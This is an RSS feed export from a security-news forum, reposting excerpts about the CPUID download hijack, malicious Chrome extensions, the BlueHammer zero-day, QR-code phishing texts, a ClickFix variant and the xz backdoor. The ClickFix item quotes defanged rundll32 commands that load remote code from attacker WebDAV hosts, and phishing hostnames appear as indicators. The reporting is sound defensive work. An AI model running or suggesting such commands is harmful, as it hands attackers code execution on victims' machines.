<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Geeks for your information - Privacy & Security News]]></title>
		<link>https://www.geeks.fyi/</link>
		<description><![CDATA[Geeks for your information - https://www.geeks.fyi]]></description>
		<pubDate>Mon, 20 Apr 2026 01:42:58 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Microsoft Fixes Windows Server 2019 and 2022 Bug That Caused Unexpected Upgrades to S]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21834</link>
			<pubDate>Thu, 16 Apr 2026 07:02:59 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21834</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><a href="https://www.ghacks.net/2026/04/13/microsoft-simplifies-windows-insider-program-to-two-channels-and-ends-gradual-feature-rollouts-in-beta/" target="_blank" rel="noopener" class="mycode_url">Microsoft</a> has fixed a known issue that caused Windows Server 2019 and 2022 systems to automatically upgrade to Windows Server 2025 without user approval. The solution was confirmed in a <a href="https://www.ghacks.net/2026/04/14/windows-11-setup-now-lets-you-skip-the-update-installation-step/" target="_blank" rel="noopener" class="mycode_url">Windows</a> release health update on Tuesday, more than a year after the problem was first acknowledged in September 2024. "This issue is resolved and Microsoft has re-enabled the upgrade offer via the Windows Update settings panel," the company stated.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How the Windows Server Upgrade Bug Worked</span><br />
<br />
In September 2024, administrators reported that servers had been automatically upgraded overnight to Windows Server 2025, in some cases to versions for which their organizations did not have licenses. Microsoft said part of the issue was due to third-party update management software that was not configured properly.<br />
<br />
Software vendors disagreed, claiming the problem was caused by a procedural error on Microsoft's part, pointing to the speed of the release and how the update was classified. At the time, Microsoft did not offer a detailed explanation of the root cause and did not respond to press inquiries when the issue was first reported.<br />
<br />
<a href="https://www.ghacks.net/2026/04/16/microsoft-fixes-windows-server-2019-and-2022-bug-that-caused-unexpected-upgrades-to-server-2025/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><a href="https://www.ghacks.net/2026/04/13/microsoft-simplifies-windows-insider-program-to-two-channels-and-ends-gradual-feature-rollouts-in-beta/" target="_blank" rel="noopener" class="mycode_url">Microsoft</a> has fixed a known issue that caused Windows Server 2019 and 2022 systems to automatically upgrade to Windows Server 2025 without user approval. The solution was confirmed in a <a href="https://www.ghacks.net/2026/04/14/windows-11-setup-now-lets-you-skip-the-update-installation-step/" target="_blank" rel="noopener" class="mycode_url">Windows</a> release health update on Tuesday, more than a year after the problem was first acknowledged in September 2024. "This issue is resolved and Microsoft has re-enabled the upgrade offer via the Windows Update settings panel," the company stated.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How the Windows Server Upgrade Bug Worked</span><br />
<br />
In September 2024, administrators reported that servers had been automatically upgraded overnight to Windows Server 2025, in some cases to versions for which their organizations did not have licenses. Microsoft said part of the issue was due to third-party update management software that was not configured properly.<br />
<br />
Software vendors disagreed, claiming the problem was caused by a procedural error on Microsoft's part, pointing to the speed of the release and how the update was classified. At the time, Microsoft did not offer a detailed explanation of the root cause and did not respond to press inquiries when the issue was first reported.<br />
<br />
<a href="https://www.ghacks.net/2026/04/16/microsoft-fixes-windows-server-2019-and-2022-bug-that-caused-unexpected-upgrades-to-server-2025/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Over 100 Malicious Chrome Extensions Steal Google Tokens, Hijack Telegram Sessions, a]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21833</link>
			<pubDate>Thu, 16 Apr 2026 07:02:00 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21833</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Security researchers at <span style="font-weight: bold;" class="mycode_b">Socket</span> have identified over 100 <a href="https://www.ghacks.net/2026/02/14/260000-chrome-users-exposed-by-fake-ai-extensions-targeting-gmail/" target="_blank" rel="noopener" class="mycode_url">malicious extensions in the Chrome Web Store</a> that are part of a coordinated campaign. These extensions steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. At the time Socket published its report, all affected extensions were still available in the store. Google has not yet responded to requests for comment.<br />
<br />
The extensions were published under five different publisher profiles across various categories, including <a href="https://www.ghacks.net/2026/02/12/telegram-rolls-out-fresh-mobile-design-and-introduces-gift-crafting-feature/" target="_blank" rel="noopener" class="mycode_url">Telegram</a> sidebar clients, slot machine and Keno games, <a href="https://www.ghacks.net/2026/04/15/youtube-now-pauses-ads-automatically-when-live-chat-activity-peaks/" target="_blank" rel="noopener" class="mycode_url">YouTube</a> and TikTok enhancers, a text translation tool, and browser utilities. Socket found evidence in the code indicating the campaign is tied to a Russian malware-as-a-service operation.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What the Malicious Chrome Extensions Do</span><br />
<br />
The campaign operates with a central backend hosted on a <span style="font-weight: bold;" class="mycode_b">Contabo VPS</span>, supported by multiple subdomains that handle session hijacking, identity collection, command execution, and monetization. The largest cluster involves 78 extensions that inject attacker-controlled HTML into the browser interface using the innerHTML property.<br />
<br />
<a href="https://www.ghacks.net/2026/04/15/over-100-malicious-chrome-extensions-steal-google-tokens-hijack-telegram-sessions-and-inject-ads/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Security researchers at <span style="font-weight: bold;" class="mycode_b">Socket</span> have identified over 100 <a href="https://www.ghacks.net/2026/02/14/260000-chrome-users-exposed-by-fake-ai-extensions-targeting-gmail/" target="_blank" rel="noopener" class="mycode_url">malicious extensions in the Chrome Web Store</a> that are part of a coordinated campaign. These extensions steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. At the time Socket published its report, all affected extensions were still available in the store. Google has not yet responded to requests for comment.<br />
<br />
The extensions were published under five different publisher profiles across various categories, including <a href="https://www.ghacks.net/2026/02/12/telegram-rolls-out-fresh-mobile-design-and-introduces-gift-crafting-feature/" target="_blank" rel="noopener" class="mycode_url">Telegram</a> sidebar clients, slot machine and Keno games, <a href="https://www.ghacks.net/2026/04/15/youtube-now-pauses-ads-automatically-when-live-chat-activity-peaks/" target="_blank" rel="noopener" class="mycode_url">YouTube</a> and TikTok enhancers, a text translation tool, and browser utilities. Socket found evidence in the code indicating the campaign is tied to a Russian malware-as-a-service operation.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What the Malicious Chrome Extensions Do</span><br />
<br />
The campaign operates with a central backend hosted on a <span style="font-weight: bold;" class="mycode_b">Contabo VPS</span>, supported by multiple subdomains that handle session hijacking, identity collection, command execution, and monetization. The largest cluster involves 78 extensions that inject attacker-controlled HTML into the browser interface using the innerHTML property.<br />
<br />
<a href="https://www.ghacks.net/2026/04/15/over-100-malicious-chrome-extensions-steal-google-tokens-hijack-telegram-sessions-and-inject-ads/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[CPUID Website Hacked to Serve Malware Through CPU-Z and HWMonitor Download Links]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21808</link>
			<pubDate>Mon, 13 Apr 2026 10:20:05 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21808</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Hackers accessed a secondary API on the <span style="font-weight: bold;" class="mycode_b">CPUID</span> website between April 9 at 15:00 UTC and April 10 at around 10:00 UTC. During this time, the site served malicious download links instead of legitimate installers for several popular hardware monitoring utilities. CPUID has confirmed the breach and says the compromised API has been fixed. They are now serving clean versions of all affected tools.<br />
<br />
Users who downloaded CPU-Z, HWMonitor, HWMonitor Pro, or PerfMonitor during the six-hour period may have received tampered versions. However, CPUID's original signed binaries were not altered.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What Malware Was Delivered Through the CPUID Downloads</span><br />
<br />
The malicious downloads were funneled through <span style="font-weight: bold;" class="mycode_b">Cloudflare R2</span> storage and delivered a fake <span style="font-weight: bold;" class="mycode_b">HWiNFO</span> installer named HWiNFO_Monitor_Setup, packaged with a Russian Inno Setup wrapper. According to Kaspersky's analysis, the trojanized versions included a legitimately signed executable along with a malicious DLL called CRYPTBASE.dll, which was used for DLL sideloading.<br />
<br />
The malicious DLL performed anti-sandbox checks before connecting to a command-and-control server and executing a final payload identified as STX RAT. This remote access trojan has infostealer capabilities and has been documented by researchers at eSentire. The malware operated almost entirely in memory and used techniques to evade endpoint detection and antivirus software.<br />
<br />
The four affected software versions were:<ul class="mycode_list"><li>CPU-Z version 2.19<br />
</li>
<li>HWMonitor Pro version 1.57<br />
</li>
<li>HWMonitor version 1.63<br />
</li>
<li>PerfMonitor version 2.04.<br />
</li>
</ul>
<a href="https://www.ghacks.net/2026/04/13/cpuid-website-hacked-to-serve-malware-through-cpu-z-and-hwmonitor-download-links/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Hackers accessed a secondary API on the <span style="font-weight: bold;" class="mycode_b">CPUID</span> website between April 9 at 15:00 UTC and April 10 at around 10:00 UTC. During this time, the site served malicious download links instead of legitimate installers for several popular hardware monitoring utilities. CPUID has confirmed the breach and says the compromised API has been fixed. They are now serving clean versions of all affected tools.<br />
<br />
Users who downloaded CPU-Z, HWMonitor, HWMonitor Pro, or PerfMonitor during the six-hour period may have received tampered versions. However, CPUID's original signed binaries were not altered.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What Malware Was Delivered Through the CPUID Downloads</span><br />
<br />
The malicious downloads were funneled through <span style="font-weight: bold;" class="mycode_b">Cloudflare R2</span> storage and delivered a fake <span style="font-weight: bold;" class="mycode_b">HWiNFO</span> installer named HWiNFO_Monitor_Setup, packaged with a Russian Inno Setup wrapper. According to Kaspersky's analysis, the trojanized versions included a legitimately signed executable along with a malicious DLL called CRYPTBASE.dll, which was used for DLL sideloading.<br />
<br />
The malicious DLL performed anti-sandbox checks before connecting to a command-and-control server and executing a final payload identified as STX RAT. This remote access trojan has infostealer capabilities and has been documented by researchers at eSentire. The malware operated almost entirely in memory and used techniques to evade endpoint detection and antivirus software.<br />
<br />
The four affected software versions were:<ul class="mycode_list"><li>CPU-Z version 2.19<br />
</li>
<li>HWMonitor Pro version 1.57<br />
</li>
<li>HWMonitor version 1.63<br />
</li>
<li>PerfMonitor version 2.04.<br />
</li>
</ul>
<a href="https://www.ghacks.net/2026/04/13/cpuid-website-hacked-to-serve-malware-through-cpu-z-and-hwmonitor-download-links/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Report: Windows has a new 0-day vulnerability called BlueHammer]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21787</link>
			<pubDate>Wed, 08 Apr 2026 07:48:54 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21787</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>The next Windows Patch Day is just a week away and it is unclear whether it will include a fix for a recently disclosed 0-day vulnerability.<br />
<br />
The new security vulnerability has been <a href="https://github.com/Nightmare-Eclipse/BlueHammer" target="_blank" rel="noopener" class="mycode_url">disclosed on GitHub</a>, including proof of concept code to exploit the issue. However, there is no explanation how the issue works.<br />
<br />
Well-known security researcher <a href="https://infosec.exchange/@wdormann/116358064691025711" target="_blank" rel="noopener" class="mycode_url">Will Dormann commented</a> on the issue and confirmed that it is working. He admitted that it “may not be 100%” reliable though. It seems that frustration with MSRC, the Microsoft Security Research Center, and how it operates, was the reason for the public disclosure of the vulnerability. Whether that is true or not can’t be verified though.<br />
<br />
So, what do we know about the vulnerability so far?<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">What it is:</span> “BlueHammer” is an unpatched zero-day Local Privilege Escalation (LPE) vulnerability affecting Microsoft Windows.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Impact</span>: It allows a local attacker with limited, low-level user access to escalate their permissions to SYSTEM or elevated administrator rights. This effectively grants the attacker full control over the compromised machine.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Current Status</span>: Microsoft has not yet released an official patch or mitigation, making it a true zero-day.<br />
</li>
</ul>
<a href="https://chipp.in/software/windows/report-windows-has-a-new-0-day-vulnerability-called-bluehammer/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>The next Windows Patch Day is just a week away and it is unclear whether it will include a fix for a recently disclosed 0-day vulnerability.<br />
<br />
The new security vulnerability has been <a href="https://github.com/Nightmare-Eclipse/BlueHammer" target="_blank" rel="noopener" class="mycode_url">disclosed on GitHub</a>, including proof of concept code to exploit the issue. However, there is no explanation how the issue works.<br />
<br />
Well-known security researcher <a href="https://infosec.exchange/@wdormann/116358064691025711" target="_blank" rel="noopener" class="mycode_url">Will Dormann commented</a> on the issue and confirmed that it is working. He admitted that it “may not be 100%” reliable though. It seems that frustration with MSRC, the Microsoft Security Research Center, and how it operates, was the reason for the public disclosure of the vulnerability. Whether that is true or not can’t be verified though.<br />
<br />
So, what do we know about the vulnerability so far?<ul class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">What it is:</span> “BlueHammer” is an unpatched zero-day Local Privilege Escalation (LPE) vulnerability affecting Microsoft Windows.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Impact</span>: It allows a local attacker with limited, low-level user access to escalate their permissions to SYSTEM or elevated administrator rights. This effectively grants the attacker full control over the compromised machine.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Current Status</span>: Microsoft has not yet released an official patch or mitigation, making it a true zero-day.<br />
</li>
</ul>
<a href="https://chipp.in/software/windows/report-windows-has-a-new-0-day-vulnerability-called-bluehammer/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Traffic Violation Scam Texts Now Use QR Codes to Bypass Security Filters and Steal Pa]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21781</link>
			<pubDate>Mon, 06 Apr 2026 09:34:41 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21781</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>A phishing campaign is targeting residents across multiple US states with fake traffic violation notices delivered by text message, using embedded QR codes to direct victims to sites that steal personal and financial information. The campaign has been reported in New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey.<br />
<br />
The texts include an image of <span style="font-weight: bold;" class="mycode_b">a fabricated court</span> notice rather than a plain link, a change from the toll and parking violation scam texts that circulated widely in 2025. The image format and embedded QR code are used to make the phishing infrastructure harder for automated security tools and researchers to detect and analyze.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How the Traffic Violation QR Code Scam Operates</span><br />
<br />
The fake notices impersonate state courts, with one example claiming to be from the "Criminal Court of the City of New York." The message states that an unpaid parking or toll violation has entered formal enforcement and instructs the recipient to scan a QR code to settle the balance.<br />
<br />
Scanning the QR code leads to an intermediary page requiring a CAPTCHA to proceed. Completing the CAPTCHA redirects to a second site impersonating a state DMV or related agency. In all examples reviewed by BleepingComputer, the stated outstanding balance is <span style="font-weight: bold;" class="mycode_b">&#36;6.99.</span><br />
<br />
Phishing sites impersonating the New York DMV have used hostnames including "ny.gov-skd[.]org" and "ny.ofkhv[.]life."<br />
<br />
Proceeding past the balance screen presents a form requesting name, address, phone number, email address, and credit card details. That data is collected by the attacker and can be used for financial fraud, identity theft, follow-on phishing, or sale to other threat actors.<br />
<br />
<a href="https://www.ghacks.net/2026/04/06/traffic-violation-scam-texts-now-use-qr-codes-to-bypass-security-filters-and-steal-payment-data/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>A phishing campaign is targeting residents across multiple US states with fake traffic violation notices delivered by text message, using embedded QR codes to direct victims to sites that steal personal and financial information. The campaign has been reported in New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey.<br />
<br />
The texts include an image of <span style="font-weight: bold;" class="mycode_b">a fabricated court</span> notice rather than a plain link, a change from the toll and parking violation scam texts that circulated widely in 2025. The image format and embedded QR code are used to make the phishing infrastructure harder for automated security tools and researchers to detect and analyze.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How the Traffic Violation QR Code Scam Operates</span><br />
<br />
The fake notices impersonate state courts, with one example claiming to be from the "Criminal Court of the City of New York." The message states that an unpaid parking or toll violation has entered formal enforcement and instructs the recipient to scan a QR code to settle the balance.<br />
<br />
Scanning the QR code leads to an intermediary page requiring a CAPTCHA to proceed. Completing the CAPTCHA redirects to a second site impersonating a state DMV or related agency. In all examples reviewed by BleepingComputer, the stated outstanding balance is <span style="font-weight: bold;" class="mycode_b">&#36;6.99.</span><br />
<br />
Phishing sites impersonating the New York DMV have used hostnames including "ny.gov-skd[.]org" and "ny.ofkhv[.]life."<br />
<br />
Proceeding past the balance screen presents a form requesting name, address, phone number, email address, and credit card details. That data is collected by the attacker and can be used for financial fraud, identity theft, follow-on phishing, or sale to other threat actors.<br />
<br />
<a href="https://www.ghacks.net/2026/04/06/traffic-violation-scam-texts-now-use-qr-codes-to-bypass-security-filters-and-steal-payment-data/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Google Introduces Advanced Ransomware Defense and Recovery Features in Drive]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21700</link>
			<pubDate>Tue, 31 Mar 2026 08:58:17 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21700</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Google has officially moved its <a href="https://gbhackers.com/sql-server-ransomware-attacks-how-they-work-and-how-to-harden-your-database/" target="_blank" rel="noopener" class="mycode_url">advanced ransomware detection </a>and file restoration features for Google Drive out of beta, making them generally available to organizations globally.<br />
<br />
Originally launched for beta testing in September 2025, these security enhancements are designed to minimize the destructive impact of malware attacks on both personal and corporate endpoints.<br />
<br />
<img src="https://gbhackers.com/wp-content/uploads/2026/03/image-107-1024x813.png" loading="lazy"  alt="[Image: image-107-1024x813.png]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i">The Admin console setting for ransomware detection</span> (Source: Google)The general availability release brings massive upgrades to Google’s threat detection engine.<br />
<br />
Powered by an updated AI model, the system now identifies 14 times more infections than the previous beta version.<br />
<br />
<img src="https://gbhackers.com/wp-content/uploads/2026/03/image-108-1024x720.png" loading="lazy"  alt="[Image: image-108-1024x720.png]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i">The Admin console setting for Drive file restoration </span> (Source: Google)It recognizes a much wider variety of modern <a href="https://gbhackers.com/secure-email-accounts/" target="_blank" rel="noopener" class="mycode_url">ransomware encryption methods</a> and detects malicious behavior significantly faster, providing comprehensive protection against rapidly evolving threat actors.<br />
<br />
<a href="https://gbhackers.com/google-introduces-advanced-ransomware-defense-drive/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Google has officially moved its <a href="https://gbhackers.com/sql-server-ransomware-attacks-how-they-work-and-how-to-harden-your-database/" target="_blank" rel="noopener" class="mycode_url">advanced ransomware detection </a>and file restoration features for Google Drive out of beta, making them generally available to organizations globally.<br />
<br />
Originally launched for beta testing in September 2025, these security enhancements are designed to minimize the destructive impact of malware attacks on both personal and corporate endpoints.<br />
<br />
<img src="https://gbhackers.com/wp-content/uploads/2026/03/image-107-1024x813.png" loading="lazy"  alt="[Image: image-107-1024x813.png]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i">The Admin console setting for ransomware detection</span> (Source: Google)The general availability release brings massive upgrades to Google’s threat detection engine.<br />
<br />
Powered by an updated AI model, the system now identifies 14 times more infections than the previous beta version.<br />
<br />
<img src="https://gbhackers.com/wp-content/uploads/2026/03/image-108-1024x720.png" loading="lazy"  alt="[Image: image-108-1024x720.png]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i">The Admin console setting for Drive file restoration </span> (Source: Google)It recognizes a much wider variety of modern <a href="https://gbhackers.com/secure-email-accounts/" target="_blank" rel="noopener" class="mycode_url">ransomware encryption methods</a> and detects malicious behavior significantly faster, providing comprehensive protection against rapidly evolving threat actors.<br />
<br />
<a href="https://gbhackers.com/google-introduces-advanced-ransomware-defense-drive/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ClickFix Evades PowerShell Detection via Rundll32 and WebDAV]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21699</link>
			<pubDate>Tue, 31 Mar 2026 08:57:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21699</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>A new variant of the ClickFix attack technique that shifts execution away from commonly monitored tools like PowerShell and mshta, instead abusing native Windows components such as rundll32.exe and WebDAV.<br />
<br />
This evolution allows attackers to bypass traditional script-based detection mechanisms, increasing the likelihood of a successful, stealthy compromise.<br />
<br />
The attack begins similarly to earlier ClickFix campaigns. Victims are lured to a phishing website disguised as a CAPTCHA page, such as “healthybyhillary[.]com.”<br />
<br />
The CyberProof Threat Research Team has <a href="https://www.cyberproof.com/blog/the-clickfix-evolution-new-variant-replaces-powershell-with-rundll32-and-webdav/" target="_blank" rel="noopener" class="mycode_url">observed a new variant of the ClickFix technique</a>, where attackers manipulate the user into executing a malicious command on their own device through the Win + R shortcut. <br />
<br />
<img src="https://www.cyberproof.com/wp-content/uploads/2026/03/image-8.png.webp" loading="lazy"  alt="[Image: image-8.png.webp]" class="mycode_img" /><br />
Phishing Website (Source : CyberProof).<br />
<br />
The page instructs users to open the Windows Run dialog using “Win + R,” paste a command, and press Enter. This <a href="https://gbhackers.com/the-role-of-social-engineering-in-business-email-compromise-attacks/" target="_blank" rel="noopener" class="mycode_url">social engineering trick </a>convinces users to execute malicious commands themselves.<br />
<br />
Observed commands include:<ul class="mycode_list"><li>rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.<br />
</li>
<li>rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.<br />
</li>
<li>rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.<br />
</li>
</ul>
These commands leverage the Windows WebDAV mini-redirector using the \server@port syntax. This allows remote files hosted over HTTP (port 80) to be accessed like local network shares.<br />
<br />
<a href="https://gbhackers.com/rundll32-and-webdav/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>A new variant of the ClickFix attack technique that shifts execution away from commonly monitored tools like PowerShell and mshta, instead abusing native Windows components such as rundll32.exe and WebDAV.<br />
<br />
This evolution allows attackers to bypass traditional script-based detection mechanisms, increasing the likelihood of a successful, stealthy compromise.<br />
<br />
The attack begins similarly to earlier ClickFix campaigns. Victims are lured to a phishing website disguised as a CAPTCHA page, such as “healthybyhillary[.]com.”<br />
<br />
The CyberProof Threat Research Team has <a href="https://www.cyberproof.com/blog/the-clickfix-evolution-new-variant-replaces-powershell-with-rundll32-and-webdav/" target="_blank" rel="noopener" class="mycode_url">observed a new variant of the ClickFix technique</a>, where attackers manipulate the user into executing a malicious command on their own device through the Win + R shortcut. <br />
<br />
<img src="https://www.cyberproof.com/wp-content/uploads/2026/03/image-8.png.webp" loading="lazy"  alt="[Image: image-8.png.webp]" class="mycode_img" /><br />
Phishing Website (Source : CyberProof).<br />
<br />
The page instructs users to open the Windows Run dialog using “Win + R,” paste a command, and press Enter. This <a href="https://gbhackers.com/the-role-of-social-engineering-in-business-email-compromise-attacks/" target="_blank" rel="noopener" class="mycode_url">social engineering trick </a>convinces users to execute malicious commands themselves.<br />
<br />
Observed commands include:<ul class="mycode_list"><li>rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.<br />
</li>
<li>rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.<br />
</li>
<li>rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.<br />
</li>
</ul>
These commands leverage the Windows WebDAV mini-redirector using the \server@port syntax. This allows remote files hosted over HTTP (port 80) to be accessed like local network shares.<br />
<br />
<a href="https://gbhackers.com/rundll32-and-webdav/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Red Hat Warns of Malware Embedded in Popular Linux Tool, Opening Doors for Unauthoriz]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21692</link>
			<pubDate>Fri, 27 Mar 2026 11:28:09 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21692</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Red Hat has issued an urgent security alert regarding a highly sophisticated supply chain attack targeting the popular xz compression utility.<br />
<br />
Cybersecurity researchers discovered malicious code embedded within recent versions of the xz libraries, which could potentially grant threat actors unauthorised remote access to <a href="https://gbhackers.com/critical-crackarmor-vulnerabilities-expose-12-6-million-linux-servers/" target="_blank" rel="noopener" class="mycode_url">affected Linux systems</a>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Technical Analysis of the Exploit</span><ul class="mycode_list"><li>The vulnerability is tracked as CVE-2024-3094.<br />
</li>
<li>Compromised tools include the general-purpose data compression formats xz and xz-libs.<br />
</li>
<li>Malicious code is actively present in versions 5.6.0 and 5.6.1.<br />
</li>
<li>Security teams recommend reverting to the safe 5.4.x releases.<br />
</li>
<li>Affected distributions currently include Fedora Rawhide, Fedora 40 Beta, Debian unstable (Sid), and openSUSE.<br />
</li>
<li>The primary threat involves unauthorized remote system access via an SSH bypass.<br />
</li>
</ul>
The xz utility is a fundamental data compression format utilized across nearly every community and commercial <a href="https://gbhackers.com/linux-distros/" target="_blank" rel="noopener" class="mycode_url">Linux distribution </a>to manage large file transfers.<br />
<br />
The malicious injection specifically targets versions 5.6.0 and 5.6.1 of the libraries. Threat actors heavily obfuscated the payload, ensuring the complete exploit is only assembled within the official download package.<br />
<br />
<a href="https://gbhackers.com/red-hat-warns-of-malware-embedded-in-popular-linux-tool/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Red Hat has issued an urgent security alert regarding a highly sophisticated supply chain attack targeting the popular xz compression utility.<br />
<br />
Cybersecurity researchers discovered malicious code embedded within recent versions of the xz libraries, which could potentially grant threat actors unauthorised remote access to <a href="https://gbhackers.com/critical-crackarmor-vulnerabilities-expose-12-6-million-linux-servers/" target="_blank" rel="noopener" class="mycode_url">affected Linux systems</a>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Technical Analysis of the Exploit</span><ul class="mycode_list"><li>The vulnerability is tracked as CVE-2024-3094.<br />
</li>
<li>Compromised tools include the general-purpose data compression formats xz and xz-libs.<br />
</li>
<li>Malicious code is actively present in versions 5.6.0 and 5.6.1.<br />
</li>
<li>Security teams recommend reverting to the safe 5.4.x releases.<br />
</li>
<li>Affected distributions currently include Fedora Rawhide, Fedora 40 Beta, Debian unstable (Sid), and openSUSE.<br />
</li>
<li>The primary threat involves unauthorized remote system access via an SSH bypass.<br />
</li>
</ul>
The xz utility is a fundamental data compression format utilized across nearly every community and commercial <a href="https://gbhackers.com/linux-distros/" target="_blank" rel="noopener" class="mycode_url">Linux distribution </a>to manage large file transfers.<br />
<br />
The malicious injection specifically targets versions 5.6.0 and 5.6.1 of the libraries. Threat actors heavily obfuscated the payload, ensuring the complete exploit is only assembled within the official download package.<br />
<br />
<a href="https://gbhackers.com/red-hat-warns-of-malware-embedded-in-popular-linux-tool/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
